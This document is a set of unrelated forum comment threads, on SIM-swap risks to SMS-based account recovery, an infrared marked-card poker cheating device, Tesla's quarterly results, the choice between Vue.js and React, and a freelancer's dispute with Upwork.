She didn't have (or couldn't access) a backup account and couldn't remember the answers to any of her security questions, or at least not enough of them.

I always thought Google was trying to tie your gmail account back to a cell phone number so they could help end anonymity on the Internet. Or else give the information to the NSA or something. I'm trusting Google less and less these days.

At the very least, Google should not have come out in favor of a particular Presidential candidate. Corporations have become incredibly powerful entities, able to affect the lives of all their employees and many others. If they can't wield this power ethically, they need to be shut down or we risk suffering under fascism.

I imagine adding a phone number to your Google account is more about Google having a particular phone number explicitly linked to an account for their information graph rather than for security reasons.

This is how Russians hacked social media accounts and public emails of British MPs last year.

It is assumed that they procured IMSI IDs of MPs from open sources (databases of gaming companies (this why Google lets apps to read your IMSI) or advertising cookie brokers).

Then, they used Russian cell phone networks to announce a Roaming transfer of their phone numbers from BT to them and then used an SMS login and password recovery from their Snapchats/Twitters/Whattsups. Once they logged into them, it is believed that they downloaded past conversations and other data through synchronisation APIs.

Back then, Google only confirmed that they did sent a recovery SMS to one account, but hackers didnt manage to answer a security question. This probably deterred them from attempting to try the same trick on Google accounts of other MPs whose numbers they pwned, or maybe Googlers simply made that up to cover their asses.

Well of course it makes your account less secure. It's another attack vector. As shown in the post, Google doesn't say add a phone number "to make your account more secure", it says "so you don't get locked out". Intuitively, making it more difficult to get locked out of your own account would likely make it easier for someone else "not to be locked out" of your account.

Google fills my droid with bloatware. Even worse: all of Google apps will not work without Google Play Services which is a super abusive app: among other things, it logs ALL MY ACTIVITY 24-7. So, if Google already runs apps with such privileges, why not adding a small app that mimics Whatsapp SMS verification. After verifying that a given SIM is installed on the phone where my Google account has been authenticated, it can establish a secure tunnel to send me 2FA codes. If a hacker would clone my SIM and even have my Google password they can prevent login until I grant permission from the first install/verification. Should I lose/change my phone, Google would not allow a second verification unless a pin is entered (which I created on the first SIM verification). Another aproach that avoids the pin number would be a delay before authenticating the second install. If I get 24hrs and a notifcation that I have logged-in on a second device, I certainly have enough time to fix any possible hack.

SIM swap fraud has been common in South Africa for years, and bank accounts were being cleaned out before the cell networks tightened their procedures. Yet I've started to see reports of similar scams in the developed world.

I'm surprised that anyone is surprised by this. Perhaps the time has come for a more global approach to security.

Would using a dedicated phone number (sim) that is not shared with any other service protect you from this? Basically nobody besides Google and you would know of this number. In India dual sim phones are very common and I've been thinking of getting a second sim (phone number) for this purpose.

Google does another stupid thing (or at least it used to do two years ago, but I think it's still doing it): when you pick Google Auth for 2FA, and for some reason you can't use it, you can still login to your account with an SMS code...

Like WTF Google? Any attacker could just as easily do that, too, anytime they want. As long as this remains true, Google Authenticator (or any other Google security measure that could easily by bypassed this way with SMS) has literally zero advantages over SMS, while retaining the disadvantages of being less convenient to use, etc.

SS7, phone numbers and telco stuff are built on trust, with a 1970s/1980s business model when the only people messing with the system was the ILEC.

It's trivially easy to fake scanned documents proving that you're authorized to port a phone number from one service to another. In this case there was probably no SS7 messing about at all, just somebod falsifying the info or socially engineering his cellular carrier to transfer the number to a new phone. Mitnick's "Art of Deception" book is an authoritative resource on this problem.

What are the security implications of using my google voice number as a backup phone number to my google account (the same account)? I've been doing this for a few years, and its been very convenient. Basically, any time I need to log in with a new browser or device, using the number for two factor SMS gives me codes on all other logged in gmail windows, and on my phone.

AFAICT, and this is supported by the Google screenshot shown promoting the feature, Google doesn't say the phone makes the account more secure, it says that it makes the account more usable, since it provides a way to recover from lockouts. This is one of many cases where usability and security aren't aligned.

i always failed to see why adding a phone number would be somehow more secure. However, i also knew this kind of attack was somewhat common for German online banking accounts using SMS TAN because service providers were easily convinced to send a new (second) sim card to a new address they would never heard of before.

Ha! My telco in UK(giffgaff) does not have any phone customer support, so the only way anyone could ask for an account transfer would be through a webform....after logging in to my account. Doing which would also send a notification to my email address. Feels slightly safer now.

TLDR: Telcos really are the weakest link, and you should not rely on your mobile phone number for 2FA.

Background: I have worked in IT Security at an Australian bank, and had close ties to the Internet Fraud department to help them understand fraudster's tactics.

Many banks use SMS for 2FA. Australia has a law regarding how long it should take customers to switching telco providers (called 'Porting' because your retain your phone number), and the timeframe in which this must be completed (90% within 3 hours, 99% within 2 business days). If the Telco doesn't complete in this time period, you can raise a complaint to the Telecommunications Industry Ombudsman.

Example: If you are currently with Telco A, to port your number to another company, you call Telco B and provide your details. They take care of the porting process, and you can have your service running on a new phone and SIM within 3 hours.

"All you need to have with you is your mobile number, the name of your old mobile provider, your account type (pre- or post-paid) and your account number. We'll handle the porting process from there. It can take from three hours to three days, but we try to do it as fast as we can."Source: https://www.cnet.com/au/news/switching-telcos-easier-than-yo..., 2012

To make matters worse, the fraudsters would then change the details at the new Telco B (i.e. my address is now 123 Rainbow Road, and my mother's maiden name is Smith, not Jones). When the victim called Telco B, when Telco A told them a porting request had been completed, they'd say "Sorry, we have no idea who you are and the details you're providing don't match our records". It can take days to sort the whole thing out, by which time, your Internet Banking has been compromised and funds transferred out.

This was a major problem for Australian banks, because they cover the losses for customers if you lose funds as a result of Internet Banking, as long as you weren't negligent (e.g. you left your Internet Banking logged in on a public computer in a library, or something).

If you are relying on your telephone number as a security mechanism, I would change to something else. Something you have, ideally (Google Authenticator, a physical hard token, etc.).

The phone companies have horribly bad security practice. I once had a phone number taken over by someone. When asked, the phone company just said, oh, someone called in and wanted to take over the billing of the account, so we let him. WTF.

This is serious problem. In some banks having access to a phone allows the attacker to login into a web client and transfer money from the account. And many web services rely on SMS as a method to restore the password.

I've also noticed that there's something very surprising about how Google has implemented their 2FA. When I log into Gmail from a new computer, it does not text me an authentication code and then lock me out of the account until I enter the code. Instead it lets me into my account immediately with only a password, and then sends my phone a notification that someone has logged in from a new computer. Ignoring this notification has no consequence for the logged-in computer. Convenient indeed, but this is really not how I expect 2FA to work, and does nothing to prevent an attacker from reading the contents of your emails or sending fraudulent emails with nothing but a password.

"Right now there is some scary technology coming out of China that incorporates IR marked cards, concealed cameras and computer analyzers. Combined to create a high-tech card marking system, I must say that this device could do for cheats what silicon did for the cosmetic surgery business. The devices are being marketed as poker analyzers."

"The technology works like this. The long edge of every card in the deck is marked with an invisible IR marking. Each mark identifies an individual card. In collusion with a poker dealer, the special marked deck is swapped into play. The player sits opposite the dealer on the table. He positions a concealed camera on the table (usually disguised as a cell phone). The camera has an IR lens that is used to transmit an image of the edge of the deck of cards to a small computer located in a smart phone (the poker analyzer) in his pocket. The image is transmitted during the period after the dealer has shuffled the cards and the deck is resting in front of the dealer before cards are dealt to the players. The IR snapshot of the cards looks like a barcode. The poker analyzer identifies every card in the order that they will be dealt to the players in less than a second. A computer-generated voice message is sent to the player via a Bluetooth mini earpiece communicating the rankings of all the hands on the table."

And the countermeasures:

"Most surveillance cameras, in their natural state, actually have infrared viewing capabilities. The problem is the picture is not so good, so manufacturers add a cut filter over the CCD chip to block out infrared light.... A number of major surveillance camera systems provide end users the ability to remotely change the IR status of the camera via the operators keyboard. This allows the operator who suspects someone is marking cards at a table to use a PTZ camera assigned to the table to switch to IR mode so the cards can be checked live on the game. If you currently dont have this feature, speak to your manufacturer."

An interesting bit of computer history trivia is that Claude Shannon co-invented the first wearable computer with Ed Thorp to beat roulette in Vegas in 1961. It used a button in the shoe as an input device for the user to record the speed and location of the ball which was used to infer the likely ending location using orbital decay algorithms. An auditory signal was then sent by wire to an earpiece to let the user know where to place bets (it wasn't pinpoint accurate - the user would bet on 8 numbers which still gave him a positive expected value).

The article says this device is used to cheat in Vegas, but I don't see how that would be possible since you have to bring your own cards. It's hard to imagine casinos colluding on this, so I guess they're talking about private games that happen to be in Vegas?

The technique with the markings on the edge of the card is also used in a well known card magic routine - but using wax instead of infrared ink, so you can feel the slight differences in texture when you handle the card (though only if you're paying attention to it).

This is an impressive breakdown of an even more impressive device. Realtime(ish) cheating software running on custom concealed hardware in a lookalike device? Used for scamming high rollers in private games? Color me fascinated.

I wonder how long this has been around. I would be very interested to hear from anyone who knows how long these have been available/prevalent. My apologies if this is somewhere in the video, I have not been able to watch it yet.

This seems like it'd be mostly used in private games, of which I'm sure there are a huge number. Many of those are probably also going to be pretty high stakes, and if someone loses a bunch they may not be inclined to go to authorities and claim cheating - if said authorities would do anything anyways. ("Awww, you lost your money in an off the books backroom private game? Perhaps next time you'd like to try one of our fine professionally run casinos.").

I suspect that most casinos are set up with surveillance designed to catch point source IR LED illumination these days.

Hmm with an incredible enough camera you theoretically ought to be able to see and then memorize idiosyncracies per card with any deck and then take it to Vegas at any table. I'd say its possible now, although too slow and expensive and obviously seeing the same card as the same card from every side is the hardest part. The camera and light would probably be a fair amount larger, too.

I think it would be easier to count cards then to rely on something like this. Sure, you're still working with odds, but then you don't have a device and marked cards which limits your exposure to having something horrible happen to you in some back room game.

Why would you specifically mention "Chinese made" in the title? The actual article has a different title. Also, why does the fact that this device is made in China says anything about the device itself?

This is pretty silly. No casinos or card rooms let you have a phone/device at the table.

That aside, you need to have a special marked deck. People have tried something similar with flourescent ink and special glasses. I think professional shuffling devices have some kind of built in blacklight check now for this. IR is a bit better since its harder to detect without a camera. You would still need to have a tub of ink and manually mark the cards though.

You'd basically need to have the dealer in on it, and if that is the case you don't really need the device at all.

Really great news! But something that shouldn't be overlooked is the discounts they gave in Q3 to push deliveries up.

First, those that know me know that I am a Tesla FANATIC. My girlfriend once challenged me to not talk about Tesla (motors, energy, something) for a 24 hour period. I dunno if I've ever done that honestly. I'm also an owner (no surprise given my fanaticism, lucky to be able to afford one). And I also own some TSLA.

Elon sent a company-wide email in Q3 to push sales to show profitability. I don't think its a fluke but they did something they never really do to help reach this number: they offered significant discounts on vehicles (new, pre-owned, showroom). Like, really big discounts (relative to the price of the car).

That certainly helped. Elon also sent an email at the start of Q4 that NO MORE DISCOUNTS are allowed. So I'm really very interested to compare Q3 to Q4 when that comes.

I also happen to know a lot of the people who bought a heavily discounted Tesla in Q3 feel kind of burned that right at the beginning of Q4 Tesla announced the new Autopilot hardware (that isn't retrotfitable on old vehicles). If you did your homework on Tesla though, this wasn't a surprise. It was expected that Tesla would make some big announcement to spur Q4 sales especially after Elon said there wouldn't be any capital raises in Q4 while he expected to hit Q4 numbers. You generally can't do that without some big news.

The Economist recently did a good article on the financing of Elon Musk's companies that flew under the radar of Hacker News that probably warranted further discussion [1] [2]. (Though the author of that piece completely misses the relative importance of each company to Musk, suggesting "he could try to sell [...] SpaceX, through gritted teeth, to a defence firm")

It's unfortunate there's a bit of a reality distortion field around discussion Elon Musk's companies sometimes. Maybe because everyone wants his companies to succeed...

Related, at the beginning of Q3 Elon Musk sent email to employees urging to cut costs:

> I thought it was important to write you a note directly to let you know how critical this quarter is, The third quarter will be our last chance to show investors that Tesla can be at least slightly positive cash flow and profitable before the Model 3 reaches full production.

> Total Q3 GAAP revenue was $2.30 billion, up 145% from Q3 2015, while total Q3 gross margin was 27.7%, compared to 21.6% in Q2. Total automotive revenue was $2.15 billion on a GAAP basis, up 152% from Q3 2015. Our final Q3 delivery count was 24,821,over 300 more than the estimated delivery count we shared on October 2nd. Deliveries increased 114% from the third quarter of 2015, and was comprised of 16,047 Model S and 8,774 Model X vehicles. In addition, 5,065 vehicles were in transit to customers at the end of the quarter. These vehicles will be delivered in Q4.

I imagine this is because the majority of revenue is spent on growing the buisness, rather than going into profit (As profit = revenue - expenses). As Tesla still has a lot more space to grow. Same method Amazon did until recently for years.

One thing to note, I have a few friends who work at Tesla service centers. They cut A LOT of corners when it comes to service to show profits this quarter. For example, for the location that one of my friends works at (which happens to be one of the busiest locations in Southern California), they sold almost every single loaner vehicle as a used car.

I'm impressed and skeptical of the substantial increase in production. A 70% increase in production in one year would likely require substantial changes in the production stages. Hopefully Tesla didn't cut any corners to hit this production number; I'm hopeful that they just scaled back their production initially and now show their "full potential", or added a lot of new machinery in their production line(s). Maybe they will reach the 500,000 target.

I do very little web these days, mostly working on backend data processing, network I/O and distributed comms.

A bit over a year ago, I wanted a real-time web UI to visualize some of the data I had on server-side, which I was trying to do using SignalR. I went back through some of the popular frameworks, with a pretty simple mindset of "Can I read the 'getting started', and get something basic working in about 15 minutes?".

I ended up choosing Vue, mainly because it used simple objects for models and I could literally just pass stuff I got from SignalR directly into it and have it show up. Almost everything else I tried had some type of wrapper/proxy around the data, which meant you had to run through some mapping exercise to get models working. I was close to deciding on Mithril, but when I found vue it just clicked with me way more. I actually really wanted to do React, but Vue was just so much more approachable that I couldn't justify spending the extra time learning React.

The real test however came months later, when I went to modify and add more functionality to my simple debug UI. I was able to pick it up nearly instantly, and even made some fairly substantial changes.

Contrast to my experience with say, Ember. We have a big app written in Ember, and every time I try to do even what I think should be a simple change (after not touching it for months), it takes me 5 times longer than I thought, and I end up spending most of the time fighting with it before realizing I forgot one of the 5 places you have to modify to reference an additional dependency, or some other equally trivial but infuriating detail.

You can learn the basics of Vue in minutes, and be quite adept within hours of it. That's something not a lot of frameworks can claim, and it's a seriously underrated benefit.

As someone who went through the complete frontend hype-trains (jquery, backbone, angular, ember, react, all in production): Vue.js 2.0 with single file components is exactly what everyone looks for desperately.

- performance: faster than react now

- learning curve: a few hours from scratch

- getting started: cli-tool for initial scaffold & configuration

- components: simple .vue files with a <template/>, <script/> and <style/>. Super easy to get going, no need for JSX

- "official" packages for routing, ajax and state management. No wasting of days for choosing every tiny package for days

- vuex 2.0 is one of the cleanest flux implementation i've seen in the last year

... and much more. Give it a try with the full webpack template of the cli tool!

I actually interviewed with Jacob Schatz when he was trying to figure out which frontend framework to use for GitLab. I had been working in React for the last year or so which was apparent on my resume.

He prefaced our interview with something to the effect of "I know you do a lot of React but we are not going to ever use React at GitLab"

It was weird. I tried to ascertain his reasoning and pretty much all I got was "just because it's popular doesn't mean it's good".

Regardless I think GitLab is an awesome company, I just got the feeling Jacob wanted to use Vue.js because it wasn't the most popular choice. \_()_/

The thing I like about React is that I don't have to think about the DOM. As soon as I see "el: #id" it's basically over for me. I don't want to think about DOM elements, or at least minimize my exposure to them.

And it's not just that I don't like to think about the browser DOM. It's that I don't want my UI coupled to the DOM. Obviously your UI will be coupled to the DOM to some extent, but React minimizes that. What I love about React is not just `react-dom` but also, say, `react-canvas`, or that you can apply the same principles and work with React Native.

But hey, the more software libs to play with and choose from, the merrier! Cheers!

I am more and more of the opinion that you should NOT use a js framework for long term projects (that span more than a few years), but just use vanilla js with some libraries that you can easily switch when something better comes out.Vue.js is here today, and it is nice, but tomorrow gintzx.js comes out, and the community will be flabbergasted and everyone will use it and vue.js will slowly die.Making big complex webapps with just some libs is absolutely possible. Just choose them wisely and make a good directory structure.

As a primarly backend dev, I'm very comfortable with React and I don't particularly want to switch to Vue.js. React says me : learn the HTML basics and then deal with abstractions (proof: React Native !). Vue.js says me : deal with HTML templates, everytime, everywhere. Although we even end to deal with HTML in React, I think it's easier for a backend dev with no front experience at all to grasp it. I showed React to a old java dev and he said that React reminded him some java web frameworks like Wicket or JSF. I guess Vue.js would have scared him.

Ok, so I've built stuff in Vue.js, React and Angular and I need to understand all the rage. I mean, Vue.js is just like Angular but with less features? I like that it's slimmer, don't get me wrong, but I just don't understand the "woah, Vue.js is the shit!" when we've had Angular for so long.

There's something that irks me about incorporating logic into templates. UI development is hard enough without having to bounce between js and templates to figure out how a component is actually going to behave. I haven't used Vue or React, so this is all just my gut speaking, but at least with React all the logic is there in front of you.

In my mind, if there's a loop or a conditional or whatever piece of logic that decides what will actually show up, that should happen where the underlying data/models is actually built, and whatever acts as the view just spits it into place.

I'm still a scrub when it comes to web and UI development, so I may be speaking out of inexperience.

A long time ago (7-10 years ago) Web 2.0 was the craze. It was the beginning of making interactive web applications.

There were few major players that were even backed by companies: Dojo, Prototype, GWT, (and like 4 more that I can't remember).

These libraries were complicated and were generally component based with their own flair of inheritance. You could not iteratively enhance your existing web 1.0 app. You had to throw it out and start over again (the markup and all).

Then along came jQuery and I remember distinctly saying to myself this is the library because I can progressively/iteratively add it to our existing crap (circa 2006-10). I still pat myself on the back on being right about that library being successful (I actually forced a previous employer to use jQuery over GWT and Dojo).

Progressive enhancement is a great marketing point so maybe Vue.js will pull a jQuery :)

Personally I want Elm to take off but it doesn't really reuse existing knowledge.

To me Vue is a great tool for side projects. In React I found myself struggling to figure out what libs to use and keep myself up to date with them. I also hated configuring webpack. With Vue, I have officially supported libraries like vuex and vue-router which work great with Vue out of the box. vue-cli also allows me to scaffold projects with these libraries very easily.

But the thing I like most about Vue is it allows me, who identifies as a front-end dev or design-coding hybrid, to quickly iterate and build prototypes. Look at the single file component:

I can quickly edit the template to alter my component's DOM structure, style it with scoped css, and change its dynamic behavior in the script tag. Like the suite of Jade/Coffee/Stylus? Adding a lang attribute to each tag and you are good to go. Awesome stuff.

I know that Gitlab is written in pretty traditional Rails' style and takes advantage of turbolinks. Did you run into any difficulties adding a framework that likes to "own the page" like most single page app frameworks do? I've found these can often end up fighting with turbolinks and similar libraries.

The company I work for has an app built with Angular 1.x (the backend is .NET). We started sensing that Angular was not best choice, especially when working with 3rd party components. There are other factors to, but they have been already mentioned in other comments. Long story short, we had enough of wrapping everything in $timeout and started looking at alternatives.

After some consideration, we were left with choosing between Vue.js and React. Coming from Angular the biggest plus was two-way-binding, Vue.js had a slight advantage. We then converted a "module" (not in JS jargon) using both frameworks.

In our experience, when switching from Angular 1.x to Vue.js, there's a sense of not changing much (we were still "declaring" logic in the templates) but nonetheless doing things better, simpler and faster. The React version needed a bit more time investment (we had no prior experience in our team; a colleague from another project helped us a bit by showing us how he implemented a project using React). In the end we chose React due to the wonderful combination between it and TypeScript. We suddenly had no more string templates and refactoring was a breeze (there are, of course other benefits as well).

What I'm trying to say is that, if you have Angular 1.x experience it's easier to switch Vue. I had fun porting the "module" to Vue and would have happily worked with it if the team had not chosen React. I consider "mixins" to be one of its killer features (would have made a lot of things easier with our app). Having said that, I don't consider React that hard to grasp and don't regret that the team picket it over Vue. As long as you remember the lifecycle, programming with it can be fun and easy. The React/TypeScript combination compensates for the lack of mixins and two-way-binding (I know, MobX, but I'm talking about the "vanilla" versions).

Vue-cli is great too. It just works, creates a really well thought out initial project that can build to a single static html/js/css. Or, it can be turned into a typical express app easily. This makes Vue.js combine well with serverless.

> He pointed out that when a major software company releases a their secret sauce, there is going to be hype. Devs think to themselves,'That company writes JS differently than me, and they are prominent and successful. Is their way of writing JS better than mine? And therefore must I adopt it?'

Ahaha. No, believe me I'll not. That's ironic coming from GitLab. I mean I love that company but their front-end sucks big time and it's slow as a snail.

I as well gravitate toward Vue.js for its simplicity, but I wonder if React's mind share and community size "trump" simplicity. For example, if you're hiring for a front-end position, you'll probably get more candidates familiar and experts in React over Vue.js.

' I talk to a lot of JavaScript devs and I find it really interesting that the ones who spend the most time in Angular tend to not know JavaScript nearly as well. I don't want that to be me or our devs. Why should we write "not JavaScript?" '

Just pick something, internet and build a good structure on top of it. All this jquery-level bikeshedding is nice for your ad widgets and minimalistic web apps, but it won't help me replace proper GUI toolkits. And sadly, that seems to be in demand...

I'll cope with your ill-designed template language (heck, if I can cope with HTML, I can cope with anything) or your JS async abstraction du jour (promises, async await, that * crap), just give me something on the level of Tk or Swing. I feel like all we got in the last decade beyond e.g. Seaside is a bit less flicker and some more useless animations (looking at you, Material Design buttons).

I'm in the process of learning React, so I don't have any strong opinions of my own yet. I've read through the Vue.js "Getting Started" docs and it does look very intuitive/simply. However, what motivates me to learn React is the fact that I can build an app once and then use React Native to create an iOS and Android app. I'm assuming this isn't a requirement for Jacob and the Gitlab team but I'm wondering if his decision would be the same if he had to support native apps as well?

Can anyone compare Vue with Knockout? In the early days of Angular etc I saw a lot of people saying they chose Knockout, and were much happier than with one of the heavier frameworks. I found its simplicity very appealing too, but it seems clear now that it's not a mainstream choice. It feels to me like a dead end. The last time I looked (a year ago?) the semi-official data mapping extension had lost its maintainer. So is Vue another shot at the same approach? What are the important differences?

It's amazing that a one-person-project(well, it's more than one person now but the core part is really just one guy) can develop such a beautiful system that actually feel better than angular2 and reactjs and who knows how many are behind those two projects.

My experience started at work where we used it on an internal project. The ease of use was insane, we had something reactive and easy to work on in no more than 10 minutes. React has always had too big of a learning curve for us, so it'd have been a vanilla JS/jQuery mess if we hadn't found Vue.

We're now using it on almost any project we start (they're all very UI driven).

I met Evan You at Laracon earlier in the year, he's an awesome dude and has put a lot of thought into everything Vue. Thanks again for making Vue! :)

I had a look at Vue after a long time and then weex a react native alternative using Vue.js instead of Reactjs. Backed by Alibaba and actively developed it looked really good. But a look at issues made me a bit afraid to use it. The primary language used for discussion, suggestions etc is chinese. Documentation however is available in english.

I like the ideas of the choo framework https://github.com/yoshuawuyts/choo it's very close to vanilla js, which makes it less of a lock-in, while still bringing lessons learned and practices from redux/elm-architecture.

I am currently using it (the 4.0 branch) in a project and enjoying it.

I wish there were an equivalent to something like ember-fastboot for out-of-the-box server side rendering, though. (server-side rendering for those who care about progressive enhancement in the browser, not isomorphism).

These discussions almost never mention cycle.js. I haven't done front end in a couple of years but whenever I read something from the author of the framework, I'm pretty impressed and the choices they made seem very promising.

I tried Vue.js a few months ago and liked it a lot. But now, I need to rewrite my apps and I decided to go the Cordova road with Ionic 2, because Ionic 2 is, imho, unparalleled in its quality.

Ionic 2 uses Angular 2 and I wished there was some Ionic 2 + Vue.js bindings. However, after working with it for a bit, I found that Angular 2 is actually quite simple with the benefit of using TypeScript out of the box.

Before you dismiss Angular 2, give it a try. It's fundamentally different from Angular 1: easier to learn, less complex, faster results.

How does Vue.js handle high latency issues? With Angular 1.x I've always had issues where the GUI will "flash" while the HTML is loading and the angular.js has not yet finished loading on a slow connection (so you might briefly see all of these {{message1}} {{message2}} etc on the page). I'm curious how Vue.js handles that case or if it has the same problem.

Also, it makes the case that Angular2 is "enterprise" because many use TypeScript with it. But, TypeScript is optional in both Vue and Angular2, so people could just as easily make the argument that Vue is "enterprise" because it supports TypeScript.

Finally, it's true that Google uses/develops Angular2, so that's some significant backing. If you want to see who's using Vue:

Why is it that the first instinct of some developers is to go out and 'choose' a framework? Even before you know the thing you're building is going to be around for awhile, people automatically think they need a framework to do anything these days.

Does it feel good to let someone else make critical decisions for you, instead of thinking for yourself? Can all projects really be distilled down into some javascript framework?

The benefits of using a framework these days are rapidly evaporating as what is trendy today likely won't be in a few years anyways. And the truth is after so many months or years or commits, the benefits of structure of the framework start to fade away as the application becomes more customized and bespoke. All the complexity is in the actual application functionality, not the tiny little savings and poor abstractions that a come with a framework.

I've worked for large tech companies and small alike. It all goes the same way. Some developer who is super opinionated and passionate props up their framework of choice, or does some kind of perfunctory analysis of the "current best" of whatever is available at the time and the rest of the other more submissive developers go along with him. It has more to do with group dynamics than has to do with actual technical merit, or what is best for the product or business.

Then, once the system has become a ball of mud, the "lead" guy leaves. Or he proudly exclaims there's a new hotness in town, and that we need to rewrite our application in this new thing because it's faster, or better, or you get to type less. Or some other such bullshit. He'll then go to give demo's of how fast you can make a simple app that has nothing to do with anything -- like a simple TODO list -- "look how fast it renders!" he'll exclaim (of course forgetting to tell everyone the first page load or stale cache hit is actually worse).

I personally hate giving up the freedom of what abstractions I get to decide on, how to structure my code, how to organize my API's, etc. for a supposed one size fits all solution created by someone I've never even met or talked to, and for code that I haven't reviewed.

If it's a library that's doing something useful and providing a great API, like some 3D graphics, drawing primitives, ML, database engine, etc. that's a different story. That is useful software that actually does stuff. But for "rendering" (I say that lightly because the browser does the rendering and layout, a framework merely is a middle-man) forms and buttons and keeping state of an application? Or telling you how and where to put source files, and name things? That's your job as a developer to come up with these conventions and to build an application that is 1:1 with the problem domain.

But the copyright information (Copyright by Stanford University) has been ripped off from all the files and replaced with "Copyright (c) 2015 Upwork". No reference to stanford CS or anything like that, just copy and paste.

Which is very wrong in my book.

I wrote them a message and after some fruitless exchanges with 4 or 5 different support people, I've decided to just let it go.

The incompetence of the interview assignment, coupled with robotic support answers quickly convinced me not to waste any more time with this bunch.

Totally agree with the article, and I am more than certain that such acts and extortionate behaviour are widespread on the platform.

It seems it is part of their business model to allow clients in developed countries to find people in developing countries (all with weak legal systems and corruption) to commit illegal acts (both violations of public and private law). Just look at how many jobs involve rewriting, scraping, penetration testing (really a guise for hacking others sites) modifying existing copyrighted content to circumvent laws.

Upwork as middleman profits -- and takes a blind eye to all this corruption - since cross border police investigations are so difficult to manage when dealing with corrupt countries.

In my case, I had my competitors procuring hackers off Upwork to take down my site. We found out because one person who was contacted on Upwork to bring my site down actually contacted me via my site and provided screenshots and other evidence. There was literally a job posted requesting contractors to take my site down.

We raised this with Upwork. They did nothing.

Guess what they said?

Their customer support asked if I had proof that my site had been hacked by the specific person who posted the job on Upwork and that if had suffered financial loss as a result of the hacking! It wasn't merely enough for their client to procure contractors on the platform to commit an illegal act. They wanted proof that I suffered financial loss!!

However, I can say that we are considering a civil suit against them. It would be interesting to see how this impacts their brand.

Note: Please forgive the messy and unstructured writing. I've been writing it while walking the streets of Central London shopping for X-mas gifts.

Apologies for the capitals, ladies and gentlemen. Please can I remind all of you to be Civil.

I've just received an email from the man himself, suggesting that I'm getting people to give his FB page 1* reviews and to spam his email. He's threatened (implied) legal action directly against me.

Publicly let me say, for the record (Hopefully it doesn't get wiped), that I do not encourage any of the aforementioned behavior, nor do I condone it.

He's currently posting on reddit and generally acting like a massive douche over email to me, still. After all of this. So the above was quite hard for me to write, but remember there may well be a lot of people working at said company, that have families and lives beyond this.

I think the worst part about this is that I wasn't even surprised throughout the entire story. Anyone who has been a freelancer has dealt with the random, uncalled for threats from clients to give you a bad review or try to suspend your account. It's the reason I gave up on working on platforms like Upwork and Freelancer almost immediately.

Building a personal network is way easier to find contract work and you'll make more money in the end while creating real relationships that will help you foster your career.

I'm sorry this happened to you, and I'm super glad you revealed this persons name publicly. Good form.

From the Upwork FAQ: "You'll need to download and use the Upwork Team Appthis tool includes the Work Diary, which ensures you are guaranteed payment. By taking work-in-progress screenshots every 10 minutes, it provides proof to your clients that you are hard at work."

Screenshots every 10 minutes? You mean... screenshots of MY SCREEN every 10 minutes? That was what made me close their website and totally forget it until I've seen this submission on HN today.

Shadi, I work at Upwork and your post about your experience makes us feel terrible. Weve reopened your case and are investigating it much more thoroughly. We hope to have a response to you quicklyif you have any questions or want to provide more details, please email me at rpearson(at)upwork.com. We care very much about our freelancer community and want to make this right.Rich

1 response

Shadi Al'lababidi

16 mins ago

Rich, it shouldnt take a post like this for you (Upwork) to give someone special treatment. I know there are thousands of others like me that rely on your platform (most, far more than myself, for much larger %s of their income). In some cases this can very literally mean the difference between putting food on the table and not.They may not be able to spread the message like I, or speak English in such a manner. They may not be able to drum up enough attention, so they go unnoticed. Its no skin of Upworks back, until it turns into a PR mess. Hence why youre commenting.Lets cut the shit, Rich. Ive got 2 tickets open and have been messaging everyday for the last 11 days. Nothing, nada. Just, Weve banned you and you cant know why. (For those reading this, yes, they do say you cannot know why.So as to not to let on to why they ban you).Ive tweeted at you, nothing.Now, I have roughly 75% of a months worth of Upwork money stuck on there. If I were someone else, or someone without other income streams, what would I do? What could I possibly tell my incumbent clients? Shit, what am I even going to tell my incumbent clients? youve just left me without a months worth of wages and a big fuck you, theres nothing you can do.So, I do not want any special treatment. I will not contact you via email. This is an integral problem with Upwork itself and I will highlight it as much as I possibly can, even if that means losing the money and my reputation on there that Ive been building up over the last year.And please Rich, Im a bloody marketer for Christs sake. Dont come at me with that standard company mumbo jumbo it makes us feel terrible. Youre just being patronising.

Absolutely disgusting behavior by Kevin. I'm kinda hoping that it's just incompetence at UpWork that caused this, and not that Kevin actually knows someone at UpWork, but in all cases that's why I stopped freelancing through UpWork and similar, and started building a solid client base which know that I'm always there to help, for the right price of course. Plus I write somewhat technical and topical blog posts about the technologies I work with (mainly video encoding, processing, P2P CDNs, etc.) and that seems to pull clients in easier than it would be using UpWork.

Looking at some of their responses to reviews on Facebook (https://www.facebook.com/wiperecord/reviews/) it would appear the attitude is part of their company culture. Amazing, for a company that bills itself as trying to help people overcome their past, it appears they are simply in the business of taking advantage of a vulnerable group.

Long time user of Elance and then Upwork here. I can attest, what occurred in this story is common.

The problem that Upwork doesn't realize is that without an active and happy freelancing demographic, clients will go elsewhere. Historically, Upwork has made it a priority of catering to the client. This is evident given their JSS. For those of you who are not familiar with JSS, it is a score that companies / clients use to hire freelancers. Now, one would assume the score is based on past work with clients. This is not all the score accounts for. Timeliness is responding to invites, the number of long-term clients you maintain, the number of clients you hassle (yes, Upwork actively goes out and tells it's freelancers to hassle their clients to leave them feedback - the responsibility falls on the freelancer and only the freelancer), etc.

Thus, when clients don't leave feedback (for whatever reason), you are dinged. Upwork won't tell you by how much exactly so let me give you an example.

12 months ago, my score was 92% (Top Rated). A client hired me. We went over the terms of the contract (# of revisions, not working on the weekends, etc.). 2 weeks into the project, the client started to deviate from the terms of the contract. I let them know and they began to get pissy. This happens all the time as Upwork has created a platform where the clients hold all of the power, and they know this.

A week later the contract wrapped up, and I managed to make the client happy as they left me a 4.7/5 on my profile and a positive review. Clients are able to leave private feedback the freelancer can never see. When the JSS score updated (every two weeks I believe-mind you, I had not worked any other jobs since that job) my score went from 92% to 71%! A 21% drop.

Suffice to say, for the past 12 months, dozens and dozens of clients later (most with positive reviews); I am now only sitting in the low 80's for my JSS.

In conclusion, Upwork is the worst example of an online marketplace for freelancers who have a backbone and are not afraid to tell a client how it is. After all, we are hired for our expertise and when a client proceeds to tell us how to do our job, it poisons the freelancing community.

I think that the freelance marketplace is not good for the freelance economy as a whole. A lot of the time, it creates a race to the bottom as far as pricing, and you have to compete with workers overseas undercutting you at every corner.

When I first got started freelancing, I used eLance (which is now UpWork). I had a similar experience with a client, they suspended my account for 2+ months, and I won the dispute at the end. If I didn't have my own clients outside of eLance, I would have been screwed and not even able to pay my rent. After that, I stopped using the service and haven't looked back 4 years later.

I have a friend who actually does know someone on the executive leadership team at UpWork, I just emailed him with your article - hopefully something positive can come of that. I really hate it when all around bad human beings go around and try to make people's lives harder.

